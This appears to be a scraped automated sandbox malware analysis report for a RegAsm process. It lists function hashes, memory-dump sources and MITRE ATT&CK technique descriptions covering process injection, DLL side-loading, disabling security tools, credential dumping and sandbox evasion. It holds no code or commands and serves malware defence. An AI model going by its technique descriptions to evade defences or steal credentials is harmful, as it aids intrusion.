Instruction ID: c3a3ca77670ed80d9fbbe84a02413e0d695c37403d61b3e890b190f9529acede
Opcode Fuzzy Hash: b33e881872a22aaacf4b87af910a632eb13c23211236af1b0ac4f81e45499f35
Instruction Fuzzy Hash: 8001D135406B409FC322DF26E488551BBF6FF49300700CA1EE4C6C3611DB30A58ACF80

Uniqueness

Uniqueness Score: -1.00%

Function 00B2DA74 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1978925074.0000000000B2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b2d000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f008ba29da6f5f05442d66ed8972a0ade9d46890ad07b30d1a5f6a57797a618c
Instruction ID: 1d216aafc3f35a055d57b29f12c9b27d50d4a2cccf1de612768540ef51089b33
Opcode Fuzzy Hash: f008ba29da6f5f05442d66ed8972a0ade9d46890ad07b30d1a5f6a57797a618c
Instruction Fuzzy Hash: 43F062724083549EE7108E15DD84B63FFD8DB51735F18C49AED4C5A286C678A844CAB1

Uniqueness

Uniqueness Score: -1.00%

Function 060467C8 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d15a206a2a0b5e5a92a6d4002ffbb65ca075f3624fcbef84c65294ff862f856a
Instruction ID: e16b645f783517db5bdc92b6347296cf20b782edf7bc5eb7d672a620dbaa24a8
Opcode Fuzzy Hash: d15a206a2a0b5e5a92a6d4002ffbb65ca075f3624fcbef84c65294ff862f856a
Instruction Fuzzy Hash: 36F09071B503006FD720AA68DC41F567FE5DB42B11F15826AF264CF1E2EAB2E8458740

Uniqueness

Uniqueness Score: -1.00%

Function 06046EA0 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5963702e65fe12e2407bf5d42d36bee8c75845163ae45f7a3a276db768cf89ea
Instruction ID: 4e90ac759886dfafa4596ab371196efa5e823cc654ac15082038e67faad61132
Opcode Fuzzy Hash: 5963702e65fe12e2407bf5d42d36bee8c75845163ae45f7a3a276db768cf89ea
Instruction Fuzzy Hash: 16F037762041E83F8B514E9A5C10DFB7FEDDA8E561B084156FFD8D2241C43DC961ABB0

Uniqueness

Uniqueness Score: -1.00%

Function 0604ACB8 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36b114732107ccbb24058685aa7a5d754e0922d30faa1d8803250009a38008e3
Instruction ID: ac5a948777f2e4dd4c8dc9a901136ddd29b67d2ab5e3ce957081662c876c4ebe
Opcode Fuzzy Hash: 36b114732107ccbb24058685aa7a5d754e0922d30faa1d8803250009a38008e3
Instruction Fuzzy Hash: B8F059A13082A11FC322273968240BE3FF5DE8A65230808DBE1C7C7242DA144587C3E1

Uniqueness

Uniqueness Score: -1.00%

Function 06048341 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe4f6d45717ae0764573bb45549e71495f0da096c0ca7416c9e5e8713b361712
Instruction ID: 27ef8c7028b6f3badafe2c17061f38a349737a94548c47d75490ee009bc1ca52
Opcode Fuzzy Hash: fe4f6d45717ae0764573bb45549e71495f0da096c0ca7416c9e5e8713b361712
Instruction Fuzzy Hash: 5BF0A771F101195B9F50AA699C49ABF7BE9FB94152708403AE514D3140EB34D80687A1

Uniqueness

Uniqueness Score: -1.00%

Function 06048FC0 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a55b0b69ff66b0d1346aa52b47d6978f9a810b05c089ab6b6a709a6479697e11
Instruction ID: 556eec492d1a8952f5e518bde2329aa673cadbc283a2b9c85b5dc4a1fdd67311
Opcode Fuzzy Hash: a55b0b69ff66b0d1346aa52b47d6978f9a810b05c089ab6b6a709a6479697e11
Instruction Fuzzy Hash: F2F0CDB4C49259DFDB50DFA4C8582BEBFB0EB5A201F0085E6E40AE7350E3398A41CB40

Uniqueness

Uniqueness Score: -1.00%

Function 060454F8 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8ab2661ff3788a83b2d2c7908d4aace6b5a5e2657005ecb0879450b30a59c5b
Instruction ID: 98e3e822fd1a6b6046e3ccc9f7a34d4e8bd78aa5bd5963803d0a56d50191da8d
Opcode Fuzzy Hash: b8ab2661ff3788a83b2d2c7908d4aace6b5a5e2657005ecb0879450b30a59c5b
Instruction Fuzzy Hash: 0EF02E71A00701CFDBB6DA61E94077BBFF2AF80315F4888BCE0464AA25DA74E484CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0604AC60 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 672b01e0f1e54e17c3abf79f85e961352ca2cbeafde30a630e0360baf8a36274
Instruction ID: f4ab31e7812a0a1f04f172fc0b93d802c9ddee9379fdc93efbbf1d2a7323fe7d
Opcode Fuzzy Hash: 672b01e0f1e54e17c3abf79f85e961352ca2cbeafde30a630e0360baf8a36274
Instruction Fuzzy Hash: 0CF082712082E51FC323572868240ED3FB6DF8652570C04DBD585C7243DA140A96C7E9

Uniqueness

Uniqueness Score: -1.00%

Function 0604ADF8 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cee3cfb3266004d694cee090bf0cb4fc7cb030bc902587d7fed5a46608ca595
Instruction ID: 844946be9f9a44411e114dca74e4de6e8a7de4024d1188f692eeb07c335928f3
Opcode Fuzzy Hash: 7cee3cfb3266004d694cee090bf0cb4fc7cb030bc902587d7fed5a46608ca595
Instruction Fuzzy Hash: D9E092312011216FC3106A5AB548A9F7AEAEFC9752F00453DF20ED3242CA75184547B9

Uniqueness

Uniqueness Score: -1.00%

Function 0604C180 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be1a6135cb46b04de6c608d9585becf432d3b031c2f3cbc979b970b3ca5830af
Instruction ID: 4d688f0346b8bed8fc0b289a18b814880494f4d933d87c2a2d899b56abfefb56
Opcode Fuzzy Hash: be1a6135cb46b04de6c608d9585becf432d3b031c2f3cbc979b970b3ca5830af
Instruction Fuzzy Hash: 18F09034502B01DFD725DF26E448552BBF6FB88305700C62EE58B82A10DF70B589CF84

Uniqueness

Uniqueness Score: -1.00%

Function 06045698 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c1bf9b5542d55830bedf1f4a97aaaef7b356e1af445d237a6376e24c5ff665a
Instruction ID: 3eadfdc42a1f049b6dd1c8726af95ba60aa6a2af3ef9d110c2c2f25471642732
Opcode Fuzzy Hash: 7c1bf9b5542d55830bedf1f4a97aaaef7b356e1af445d237a6376e24c5ff665a
Instruction Fuzzy Hash: 73E012B210D311AFD345DB75AC088A7BBE9EFA5320B16C87EF444C7141EA35D841C769

Uniqueness

Uniqueness Score: -1.00%

Function 0604C120 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 353d4e2ba1170e116d15db099bf3800b3ba6b800db16ffcb3ea625f5cc96d62a
Instruction ID: 980ea50d9920b77d0fd2e23f54b44ea418c05be74acc51e2e72c0035317cb14f
Opcode Fuzzy Hash: 353d4e2ba1170e116d15db099bf3800b3ba6b800db16ffcb3ea625f5cc96d62a
Instruction Fuzzy Hash: 30E0E5302017609FC311EB2DE40979F7BE6DF85315F04092DE24A87602CBA568418791

Uniqueness

Uniqueness Score: -1.00%

Function 0604CE88 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 887755cafea5f572b8eb34b3396b38f2dbc83d327085d4793cff0fd7d1740cf8
Instruction ID: 5efb60ef986fe1dfd529524a81680c518b3dfae4a991072aa9c350f261329600
Opcode Fuzzy Hash: 887755cafea5f572b8eb34b3396b38f2dbc83d327085d4793cff0fd7d1740cf8
Instruction Fuzzy Hash: 2FE0DF70106780EFC742EB34F5928553BF0FB43A103051AC6E885DB61EDB609A0687D6

Uniqueness

Uniqueness Score: -1.00%

Function 0604CC38 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ad975bcf768f72f28257c4c53910f07557f0fc821bf268169276f4231bdb117
Instruction ID: a0abde89ebbf84ca3f2e3e031cb8f0714586f6a565f91e19cad571a104dbad18
Opcode Fuzzy Hash: 5ad975bcf768f72f28257c4c53910f07557f0fc821bf268169276f4231bdb117
Instruction Fuzzy Hash: 71E09231106250CFCB11EF28F840A997BE0FF52A10B009A56D0448B65ACA7019458B92

Uniqueness

Uniqueness Score: -1.00%

Function 0604B500 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f93b0897caf9937d660703c6485afa713a0f9ae0966b9946e64aca930315b3b
Instruction ID: 81cfa2bd2a21b3bc5534d1b1c57797dff5b5f98cf4e769c6fdc1e31912a017c2
Opcode Fuzzy Hash: 5f93b0897caf9937d660703c6485afa713a0f9ae0966b9946e64aca930315b3b
Instruction Fuzzy Hash: E8F0C975D0214DEFCB41DFF4DA498CDBBB5EB48200F1442A6D805E2254E6315B99DB40

Uniqueness

Uniqueness Score: -1.00%

Function 0604E280 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e08ed805fe01e3c817139901d2ce4902b72975fc8564b603e632161b4747c78
Instruction ID: 64782f2192bef109d50d2ccc80cacf0c4196e7ec92511494ec268016dc63cc53
Opcode Fuzzy Hash: 1e08ed805fe01e3c817139901d2ce4902b72975fc8564b603e632161b4747c78
Instruction Fuzzy Hash: 18E09231009361CFC756B714FD82A453BE1E746B00B012291E4404F5ADC7B41E45CBE7

Uniqueness

Uniqueness Score: -1.00%

Function 0604E1FF Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf735a77fe302c3eace0d2eac83dcd758779695011d8e9424b775bb0e867785d
Instruction ID: 64af7936fe8d6d27d700386f9c107b4a8a6c0f36e063759c88814ea8a7e4c1ed
Opcode Fuzzy Hash: cf735a77fe302c3eace0d2eac83dcd758779695011d8e9424b775bb0e867785d
Instruction Fuzzy Hash: 7CE0D871A05318EFCB01CB64A8005DE3BF1DB42201B2446D7E409D7251E6700F108B52

Uniqueness

Uniqueness Score: -1.00%

Function 0604F910 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5f07f22593da6bea16d89f49dd9fb39d84b2ca8f94fef106f2d9f224cfccfb1
Instruction ID: e92425479db3919e795617444d9d0f0ac32f8eccddd6fbf3713bea10e0ea6bcc
Opcode Fuzzy Hash: a5f07f22593da6bea16d89f49dd9fb39d84b2ca8f94fef106f2d9f224cfccfb1
Instruction Fuzzy Hash: 1FE0C2356052159FCB29AF7CD460496BBE7EFDA61032A88ABD984C710ACA329C0A8750

Uniqueness

Uniqueness Score: -1.00%

Function 0604AC80 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fc93fc1c22d1338a851e968c496d2fef8d5f18e50522cd63eca582656a09c87
Instruction ID: c6b478033b33ca647d460f9d93363adb3efcf6a0d22403b4da576d4d99da94c1
Opcode Fuzzy Hash: 7fc93fc1c22d1338a851e968c496d2fef8d5f18e50522cd63eca582656a09c87
Instruction Fuzzy Hash: 3DD05B3130013A6B8615276DB4584AE77FBEFC5672704092AF60BC3340CF651D9647D5

Uniqueness

Uniqueness Score: -1.00%

Function 0604E8F8 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40d2534af8b661f419562f7cf01876540e9635e3786ef77d26b30af547d547b4
Instruction ID: 98b1da2405046693bda680a43de0ed140f346d9c6c10d1d6c977a6068466736b
Opcode Fuzzy Hash: 40d2534af8b661f419562f7cf01876540e9635e3786ef77d26b30af547d547b4
Instruction Fuzzy Hash: D0E0EC392282449FC712DF68C890C547FB9BF5A61031944CAE5C08B572C231E925DB50

Uniqueness

Uniqueness Score: -1.00%

Function 0604B510 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 371c1d95f13b78dc571926e3d9ce01c426c77b1e09e23420f3277ae95f9fa1b8
Instruction ID: e4ea63b21a4c6a7448da0219892b9ac29398981e934cbacaa5bfa405fee77144
Opcode Fuzzy Hash: 371c1d95f13b78dc571926e3d9ce01c426c77b1e09e23420f3277ae95f9fa1b8
Instruction Fuzzy Hash: FDE07575D0120CFFCB40DFE4D5458DDBBB9EB48200F1082A6D905A3200EA705B559B80

Uniqueness

Uniqueness Score: -1.00%

Function 0604E210 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67807f35564ee2f43555735fea9400563f6478924a27f6439b1ec7ca92a60175
Instruction ID: 5810c6da6242442793a502023c42ccdf9ff45c5209bb451fb78415cbbeb306cd
Opcode Fuzzy Hash: 67807f35564ee2f43555735fea9400563f6478924a27f6439b1ec7ca92a60175
Instruction Fuzzy Hash: C9D05B71A0120CFFCB40DFA8F90155D77F5DB45205B1046D9D50DE7204DA711F009B91

Uniqueness

Uniqueness Score: -1.00%

Function 0604F8EA Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1c0a2cf1bde83dd965425cf1b0890efa4b0c2f1c383726967907292e2a3374b
Instruction ID: 9b09c94a58ba572d3ffe1d269b4897c9c00d1d03bc773ef07f8816ea21742f6f
Opcode Fuzzy Hash: f1c0a2cf1bde83dd965425cf1b0890efa4b0c2f1c383726967907292e2a3374b
Instruction Fuzzy Hash: 15D012327100204B4654AB5CB01452D76E3D7DC6A3355056FE60ED3344DF718D554785

Uniqueness

Uniqueness Score: -1.00%

Function 06043721 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b484db0bd5f568f4c60d0ec03d42f9e251b42b74755b4505972c861d391c733
Instruction ID: 09eb3a04d0ba00f942742c3bceda19942802eef52d3ec93c4a8e74f2a0a1b2a4
Opcode Fuzzy Hash: 5b484db0bd5f568f4c60d0ec03d42f9e251b42b74755b4505972c861d391c733
Instruction Fuzzy Hash: 96C092361002007BEB0096609E0BF967BA5A754B41F1A9014F2896A281EABA9451EEA6

Uniqueness

Uniqueness Score: -1.00%

Function 0604DFD1 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b1a2cdcdcce2cd54bd225540e0b6e6984a14d8a3b63eb985ee3fbdf76609243
Instruction ID: bb19a3df74b25a848247da59b2c38cc230391f5872951009611d2ed9e150557a
Opcode Fuzzy Hash: 9b1a2cdcdcce2cd54bd225540e0b6e6984a14d8a3b63eb985ee3fbdf76609243
Instruction Fuzzy Hash: 5AB09B221CF38459D70609784D05DC13B155B53D1074511DB95819E477D211411F46A3

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0604ED10 Relevance: 7.9, Strings: 6, Instructions: 378COMMON

Download Yara Rule

Strings

(_^q, xrefs: 0604EDF9
(_^q, xrefs: 0604EEFA
(_^q, xrefs: 0604F07A
(_^q, xrefs: 0604ED7A
(_^q, xrefs: 0604EF79
(_^q, xrefs: 0604F0F9

Memory Dump Source

Source File: 00000004.00000002.1985089777.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6040000_RegAsm.jbxd

Similarity

API ID:
String ID: (_^q$(_^q$(_^q$(_^q$(_^q$(_^q
API String ID: 0-2896069617
Opcode ID: 625bd3c04a71123686902ec078839a7d45905d7e05e8c99fd408779cda2645d1
Instruction ID: cfb959669acd3ed3db86b092f7495a893cf254a360a9663c6f67aca149476610
Opcode Fuzzy Hash: 625bd3c04a71123686902ec078839a7d45905d7e05e8c99fd408779cda2645d1
Instruction Fuzzy Hash: 2FD1CE79B052449FCB14AF78C4145AE7FF2FF86300B2485AAE946DB381DA35DE06CB91

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

